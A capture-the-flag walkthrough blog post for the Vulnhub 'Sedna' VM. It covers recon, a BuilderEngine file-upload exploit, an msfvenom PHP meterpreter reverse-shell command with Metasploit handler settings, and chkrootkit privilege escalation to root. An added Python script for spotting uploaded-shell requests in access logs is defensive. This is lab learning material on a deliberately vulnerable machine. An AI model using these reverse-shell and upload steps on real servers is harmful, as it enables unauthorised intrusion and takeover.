Hackfest2016: Sedna - VM Vulnhub.com


Sedna Vulnhub Machine Walkthrough

This is a vulnerable machine created for the Hackfest 2016 CTF: http://hackfest.ca/

Difficulty : Medium





Let’s Start
This VM very kindly shows its IP address when you fire it up, so I can skip netdiscover and arp-scan and head straight to the Nmap scan to see what the VM has to offer.

Command : nmap -A 192.168.0.133
Nmap Results








I’ll make a note of all of them and (as usual with these VMs) jump straight to HTTP on port 80 to see what the website has to offer.
I’ll just run a nikto scan before heading over to the website; the output (if any) should make our review more efficient.




Nikto findings (Interesting Results)








Cool, so it shows there’s a robots.txt file. Let’s fire up Firefox and take a look at the site and that robots.txt file.





Robots.txt file results








The robots file didn’t have anything useful in it. :-(
OK, so let’s start looking a bit deeper into what the VM has to offer. I have seen the nikto results; there is a list of directories:
192.168.0.133/files
192.168.0.133/license.txt
192.168.0.133/system
Cool, check all the files one by one. Let’s see what the license file has to say.
Open the link [your-ip]/license.txt
Info Gathering: BuilderEngine (License File)









Cool 
OK, so it seems that the site uses BuilderEngine. Let’s see if we can get into that directory. After checking, the directory does exist but I don’t have access to it. Let’s see if we can exploit the service. Heading over to exploit-db.com and searching for Builder Engine, I get this.
Find Vulnerability in Exploit-DB









Nice, so let’s try it and see if we can upload a file.
Copy the above code and replace localhost with your Sedna machine IP.

Create HTML file









So after downloading the exploit and modifying the action attribute, I had to do a bit of Googling to find out how to get it to run. It was in front of me all the time: I just had to save it as an HTML file and open it in Firefox.





Open it in Firefox









Cool, it seems to have worked so far, and it seems to allow me to upload a file that will get sent to the vulnerable directory on the web server. Let’s try to upload a standard PHP reverse shell.

Then I created a PHP reverse shell with msfvenom.
Command :
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.129 LPORT=4444 -f raw > shell.php
Created a PHP Shell








Uploaded the PHP file using the Browse button below.
Uploading Shell








After uploading the file I can see it has been uploaded and is sitting in the /files/ dir.
Shell Uploaded Successfully









Open Metasploit and set a payload
Command :
set payload php/meterpreter/reverse_tcp
show options
set LHOST [ip]
exploit
Metasploit Session









Cool, OK, now all that’s left to do is click the file and see if I can get a shell back!! AGAIN





Click the shell.php file








After I requested the shell script I had uploaded, I gained a reverse shell on the VM.




Session Created WWOWW :)








BINGO, We’re in.
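From the defender's side, the step above leaves a clear trace: a request for a server-side script inside the upload directory. The following is an added example, not part of the original walkthrough; it assumes "combined"-format access logs and the /files/ upload path seen here, and the log lines are constructed.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumptions (not from the original post): uploads are served from /files/
# and the web server writes "combined"-format access logs.
UPLOAD_PREFIX = "/files/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(?=$|[./;])", re.IGNORECASE)
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines, for illustration only.
SAMPLE_LOG = [
    '192.168.0.129 - - [10/Mar/2017:10:01:02 +0000] "GET /files/ HTTP/1.1" 200 1201 "-" "Mozilla/5.0"',
    '192.168.0.129 - - [10/Mar/2017:10:01:09 +0000] "GET /files/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.0.50 - - [10/Mar/2017:10:02:00 +0000] "GET /files/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.0.50 - - [10/Mar/2017:10:02:30 +0000] "GET /files/%73hell.PHP5?x=1 HTTP/1.1" 404 210 "-" "curl/7.50"',
    '192.168.0.50 - - [10/Mar/2017:10:03:00 +0000] "GET /files/../index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def normalise(target):
    """Drop the query string, percent-decode twice, and resolve // and ../."""
    path = target.split("?", 1)[0]
    for _ in range(2):  # second pass catches double encoding such as %2573
        path = unquote(path)
    return posixpath.normpath(re.sub(r"/{2,}", "/", path))


def suspicious_requests(lines):
    """Return (ip, method, path, status) for script files requested under the upload dir."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = normalise(m["target"])
        # A double extension (x.php.jpg) or path-info (x.php/a) also counts.
        if path.startswith(UPLOAD_PREFIX) and SCRIPT_EXT.search(path):
            hits.append((m["ip"], m["method"], path, int(m["status"])))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 deserves immediate attention; the lasting fix is to stop the web server from executing scripts in the upload directory and to validate uploads on the server side.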

First flag was in the /var/www directory.




First Flag Found








Now it was time to escalate privileges. I had some unsuccessful exploit attempts with the kernel version. Then I looked in the /etc folder to find something to exploit to gain root access, and I saw chkrootkit was installed.
Chkrootkit: chkrootkit (Check Rootkit) is a common Unix-based program intended to help system administrators check their system for known rootkits. It is a shell script using common UNIX/Linux tools like the strings and grep commands to search core system programs for signatures and for comparing a traversal of the /proc filesystem with the output of the ps (process status) command to look for discrepancies.




Find Chkrootkit








Yes! I could try to exploit this. So I backgrounded the Metasploit session and tried to exploit chkrootkit.
Chkrootkit Payload




 

After a while, I gained a new session with root.





Second Session created (Now Root :) )








Then I searched for flag.txt files.


2nd Flag Found








Huge thanks to Viper for creating this VM. I really enjoyed it and feel I learnt so many new things from working through it. As always, thanks to Vulnhub.com for hosting this and all the other amazing VMs.
Hope you like it. If you have any queries … feel free to contact me through LinkedIn or Twitter :)
